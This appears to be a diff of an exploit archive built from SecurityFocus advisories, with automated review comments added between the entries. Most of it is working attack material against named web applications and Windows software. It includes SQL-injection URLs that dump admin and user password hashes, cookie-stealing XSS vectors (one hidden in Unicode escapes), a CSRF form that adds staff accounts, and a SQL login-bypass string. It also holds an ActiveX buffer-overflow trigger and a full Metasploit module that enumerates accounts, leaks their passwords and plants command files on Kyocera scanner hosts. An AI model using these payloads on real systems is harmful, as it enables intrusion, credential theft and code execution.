http://www.example.com/Script/landsee.php?id=-9+union+select+1,2,3,concat(username,0x3a,sifre),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75+FROM+admin--


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30980/info
IDevSpot BizDirectory is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
BizDirectory 2.04 is vulnerable; other verisons may also be affected.
http://www.example.com/?page=[XsS]&mode=search


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30989/info
Open Media Collectors Database (OpenDb) is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
OpenDb 1.0.6 is vulnerable; other versions may also be affected.
http://www.example.com/user_admin.php?op=edit&user_id=<img/src/onerror=alert(document.cookie)>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30989/info
Open Media Collectors Database (OpenDb) is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
OpenDb 1.0.6 is vulnerable; other versions may also be affected.
http://www.example.com/listings.php?search_list=y&linked_items=include&title_match=partial&title=<img/src/onerror=alert(document.cookie)>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30989/info
Open Media Collectors Database (OpenDb) is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
OpenDb 1.0.6 is vulnerable; other versions may also be affected.
http://www.example.com/user_profile.php?uid=[USERNAME]&subject=No+Subject&redirect_link=Back+to+Statistics&redirect_url=javascript:alert(document.cookie)
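Review bot: `redirect_url=javascript:alert(document.cookie)` is a `javascript:` URI supplied as a redirect target, which the index files as XSS; whether it fires depends on whether user_profile.php writes it into an `href` (needing a click on the `redirect_link` text) or into a client-side redirect, and the file should say which. As written a reader will expect an immediate alert like the `onerror` vectors in the two sibling OpenDb entries.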

11
platforms/php/webapps/32316.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/30990/info
eliteCMS is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
eliteCMS 1.0 and 1.01 are vulnerable; other versions may also be affected.
http://www.example.com/index.php?page=-1%20union%20all%20select%201,2,3,4,user_name,h_password%20from%20users/*
http://www.example.com/index.php?page=-1'+union+select+1,concat(user_name,0x3a,h_password),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/*

14
platforms/php/webapps/32317.txt Executable file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/30992/info
@Mail and @Mail WebMail are prone to multiple cross-site scripting vulnerabilities because the applications fail to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
These issues affect the following versions:
@Mail WebMail 5.05 running on Microsoft Windows
@Mail 5.42 running on CentOS
Other versions running on different platforms may also be affected.
http://www.example.com/parse.php?file="><img/src/onerror=alert(document.cookie)> http://www.example.com/parse.php?file=html/english/help/filexp.html&FirstLoad=1&HelpFile=';}onload=function(){alert(0);foo=' http://www.example.com/showmail.php?Folder=Spam';document.location='\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0077\u0069\u0074\u0068\u0028\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u0029\u0061\u006C\u0065\u0072\u0074\u0028\u0063\u006F\u006F\u006B\u0069\u0065\u0029';foo=' http://www.example.com/abook.php?func=view&abookview=global"><img/src/onerror="alert(document.cookie)&email=138195 http://www.example.com/showmail.php?Folder=Inbox&sort=EmailSubject&order=desc&start="><iframe/src="javascript:alert(document.cookie)
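Review bot: The third vector's `\u00XX` run is opaque as written; it decodes to `javascript:with(document)alert(cookie)`, and recording that decoded form beside it would let a reviewer see at a glance that it is a cookie-reading payload. All five URLs are collapsed onto one line, so where one ends and the next begins is ambiguous (for example `&email=138195 http://…`); one vector per line would fix that.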


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/login.php?target="><script>alert(1);</script>
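Review bot: The description on the second line of this section claims an unspecified SQL-injection issue and an HTML-injection issue, but the only proof of concept in the file is a single reflected cross-site-scripting request, so the SQL-injection and HTML-injection claims are unsupported by the file's own content; the same applies to the eight following sections that carry the identical BID 31008 text. The affected scripts in those later sections are given as the placeholder `some.php`, so those entries do not identify a vulnerable endpoint at all; if the real path was not disclosed in the source advisory, a line such as `Note: affected script name not disclosed in the source advisory` would make that explicit rather than leaving a placeholder that reads like a real path. The file-path headers for these sections are not visible on the page, so they cannot be named here.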

platforms/php/webapps/32319.txt Executable file

@ -0,0 +1,59 @@
[+] Author: TUNISIAN CYBER
[+] Exploit Title: OpenSupports v2.x AuthBypass/CSRF Vulnerabilities
[+] Date: 15-03-2014
[+] Category: WebApp
[+] Version: 2.x
[+] Tested on: KaliLinux/Windows 7 Pro
[+] CWE: CWE-302/CWE-89
[+] Vendor: http://www.opensupports.com/
[+] Friendly Sites: na3il.com,th3-creative.com
[+] Twitter: @TCYB3R
1.OVERVIEW:
OpenSupports v2.x suffers from a CSRF and authentication bypass Vulnerabilities.
2.Version:
2.x
3.Background:
http://www.opensupports.com/wiki/index.php?title=Main_Page
4.Proof Of Concept:
CSRF:Add Staff Members
<html>
<form method="POST" name="form0" action="http://localhost/demo/admin/staffadmin.php?id=agregar">
<input type="hidden" name="nombre" value="TCYB3Rx20x"/>
<input type="hidden" name="email" value="g4k@hotmail.esxxx"/>
<input type='submit' name='Submit4' value="Agregar">
</form>
</html>
Authentication Bypass:
File: staff.php
[PHP]
if(isset($_POST['user'])){
$user = $_POST['user'];
$pass = $_POST['pass'];
$userreg=mysql_query("select * from staff WHERE user='$user' AND pass='$pass'") or die ("ERROR 1");
[PHP]
Username:1'or'1'='1
Password:1'or'1'='1
5.Solution(s):
no contact from vendor
6.TIME-LINE:
2014-13-03: Vulnerability was discovered.
2014-13-03: Contact with vendor.
2014-14-03: No reply.
2014-15-03: No reply.
2014-15-03: Vulnerability Published
7.Greetings:
Xmax-tn
Xtech-set
N43il
Sec4ver,E4A Members
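Review bot: The CWE line `[+] CWE: CWE-302/CWE-89` does not match the findings the advisory actually shows: the proof of concept demonstrates a cross-site request forgery (CWE-352, not listed) and an authentication bypass caused by unparameterised SQL string concatenation in `staff.php` (CWE-89), while CWE-302 (authentication bypass by assumption-immutable data) is not supported by anything in the file. The timeline entries `2014-13-03` and `2014-14-03` use an impossible month under the YYYY-MM-DD form; given the header `Date: 15-03-2014`, these look like day and month swapped and should read `2014-03-13` and `2014-03-14`. The closing code marker on the second `[PHP]` line should be `[/PHP]`. The Solution section records only "no contact from vendor"; since the root cause is visible in the quoted query, a one-line remediation pointer (use prepared statements and add a per-session anti-CSRF token to the staff form) would give readers something actionable.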


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/activities/some.php?title="><script>alert(1);</script>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/companies/some.php?company_name="><script>alert(1);</script>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/contacts/some.php?last_name="><script>alert(1);</script>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/campaigns/some.php?campaign_title="><script>alert(1);</script>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/opportunities/some.php?opportunity_title="><script>alert(1);</script>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/cases/some.php?case_title="><script>alert(1);</script>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/files/some.php?file_id="><script>alert(1);</script>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/reports/custom/mileage.php?starting="><script>alert(1);</script>


@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/30814/info
The Microsoft Windows Media Services ActiveX control is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
An attacker can exploit this issue to execute arbitrary code in the context of an application using the affected ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
'nskey.dll' 4.1.00.3917 is vulnerable; other versions may also be affected.
<html><body>
<object id=target classid=clsid:2646205B-878C-11D1-B07C-0000C040BCDB></object>
<script language=vbscript>
arg1=String(9752, "A")
target.CallHTMLHelp arg1
</script>
</body></html>
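Review bot: The advisory identifies the control only by CLSID and by the `nskey.dll` version and offers no mitigation; for an ActiveX control the standard defensive measure is setting the kill bit for the listed CLSID `2646205B-878C-11D1-B07C-0000C040BCDB`, which would be worth one line after the version statement. The description speaks generically of "user-supplied input", whereas the proof of concept passes a 9752-character string to `CallHTMLHelp`, so the affected method appears to be that one and the description could say so. The file-path header for this section is not visible on the page.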

platforms/windows/remote/32301.py Executable file

@ -0,0 +1,354 @@
source: http://www.securityfocus.com/bid/30855/info
Kyocera Mita Scanner File Utility is prone to a directory-traversal vulnerability because it fails to adequately sanitize user-supplied input.
Attackers can exploit this issue to create and overwrite arbitrary files on the affected computer.
Kyocera Mita Scanner File Utility 3.3.0.1 is vulnerable; other versions may also be affected.
module Msf
class Auxiliary::Spoof::Kyocera::FileUtility < Msf::Auxiliary
#
# This exploit affects TCP servers, so we use the TCP client mixin.
#
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Kyocera Mita File Utility File Injection',
'Description' => %q{
This exploit attacks the Kyocera Mita File Utility 3.3.0.1 that is part of a scan to desktop
solution. There are several bugs in this service. First, there is no authentication. This means anyone
can upload a file to the target PC. Second, the file can contain anything, including binary data. Finally,
the file name can be altered to include directory information, thus redirecting the file from
the default upload location to a specified location. Combined, the service will allow a remote attacker
to upload any file to any location on the system. If you do
not know the correct ID number of the client side account, you can use the included getidno command to
scan a system to detect any and all ID numbers. This will also provide you with any associated
passwords required by printer to upload documents.
},
'Author' => 'Seth Fogie <seth@whitewolfsecurity.com>'
)
)
register_options(
[
OptString.new('RPORT', [ true, "Target port - default is 37100", '37100' ]),
OptString.new('RHOST', [ true, "Target host", '1']),
OptString.new('CMD', [ true, "Command", 'calc.exe']),
OptInt.new('IDNO', [ true, "ID number (1-100)", '1']),
OptString.new('IDENT', [ true, "Identification name", 'ANON']),
OptString.new('FILENAME', [ true, "File name (with folder)", 'Kyocera.bat']),
OptString.new('FOLDER', [ false, "Folder (relative to scan folder)", '']),
], self.class
)
end
def auxiliary_commands
return {
"getidno" => "Determine a correct idno",
}
end
#this command detects any and all valid accounts on target machine and returns associated passwords.
def cmd_getidno()
1.upto(100) do |i|
connect
print(".")
# Build the buffer for transmission
buf= "\x00\x06\x34\x00\x00\x02\x00\x00" #control message to PC
# Send it off and get response
sock.put(buf)
sock.get
#add ID number
idno = i
buf = "\x02\x1c\x34\x02" + #details about file name for file utility function
[idno].pack('n') + #ID number
"\x00\x08" +
"\x00\x0d" +
"\x41\x41\x41\x41\x00\x4e\x53\x4e\x5f\x53\x4b\x41\x4e\x3a" +
"\x41\x41\x41\x41\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00"
sock.put(buf)
nulls="\x00\x00"
passTest="\xFF\xFF"
data=sock.get
dataStr=data.to_s
if dataStr[dataStr.length-6,2] == nulls
print("\n")
print_status("Valid account number found: " + i.to_s)
end
if dataStr[dataStr.length-2,2] != passTest
print_status("BONUS! Password! (last four or eight characters of string)" )
j=0
while j<12
printf("%X",data[j])
j+=1
end
print("\n")
end
sock.close
end
print("\n")
end
#
# The exploit sends the specified command into a kyocera.bat file in the specified folder
#
def run
begin
connect
print_status("Sending command...")
# Build the buffer for transmission
buf= "\x00\x06\x34\x00\x00\x02\x00\x00" #control message to PC
# Send it off and get response
sock.put(buf)
sock.get
#add ID number
idno = datastore['IDNO']
ident = datastore['IDENT']
filename = datastore['FILENAME']
folder = datastore['FOLDER']
locationLength = filename.length + folder.length
buf = "\x02\x1c\x34\x02" + #details about file name for file utility function
[idno].pack('n') + #ID number
"\x00\x08" +
"\x00\x0d" +
"\x41\x41\x41\x41" +
"\x00\x4e\x53\x4e\x5f\x53\x4b\x41\x4e\x3a" +
ident +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00"
sock.put(buf)
nulls="\x00\x00"
passTest="\xFF\xFF"
data=sock.get
dataStr=data.to_s
#print_status(nulls)
#print_status(dataStr[dataStr.length-6,2])
if dataStr[dataStr.length-6,2] != nulls
print_status("Invalid account number - use getidno command to find valid idno")
end
if dataStr[dataStr.length-2,2] != passTest
print_status("BONUS! Password! (last four or 8 characters of string)" )
j=0
while j<12
printf("%X",data[j])
j+=1
end
print("\n")
end
buf = "\x00\x54" + #details about file name
"\x30" + #location size (must be x30)
"\x01" + #can be altered to include folder and file
"\x00\x05\x00\x00" +
"\xff\xff\xff\xff\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x24" +
folder + filename
padding = 48-locationLength
j=0
while j<padding
buf += "\x00"
j+=1
end
#"\x4b\x79\x6f\x63\x65\x72\x61\x2e\x62\x61\x74" +
#"\x00\x00\x00"
#add command length
thecommand = datastore['CMD']
cmdLen = thecommand.length
buf += [cmdLen].pack('N')
#add command
buf << thecommand
j=0
#put file
sock.put(buf)
buf = "\x00\x04\x30\x02\x00\x00"
sock.put(buf)
buf="\x00\x04\x30\x05\x53\xdc"
sock.put(buf)
sock.get
buf="\x00\x04\x30\x03\x00\x00"
sock.put(buf)
sock.get
end
end
end
end
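Review bot: The file is added as `platforms/windows/remote/32301.py`, but its content is a Ruby Metasploit module (`module Msf`, `class Auxiliary::Spoof::Kyocera::FileUtility < Msf::Auxiliary`, `include Exploit::Remote::Tcp`), so the `.py` extension misclassifies the language for anyone indexing or syntax-highlighting the archive; `.rb` would be the accurate extension, and since the class is an Auxiliary module the `remote` category is also questionable. The four SecurityFocus header lines preceding `module Msf` are bare prose rather than `#` comments, so the file as committed is not valid Ruby and cannot be loaded by the framework without editing; if the archive convention is to keep them, that should be noted. The `RPORT` and `RHOST` options are declared as plain `OptString` entries with string defaults rather than the framework's port/host option types, which is a style inconsistency with the `OptInt` used for `IDNO`. The module's description states the service on TCP/37100 requires no authentication and accepts arbitrary file paths; for defenders reviewing this entry, that is the detection and containment point (unexpected connections to that port from outside the scan workflow), and the advisory could say so in one line.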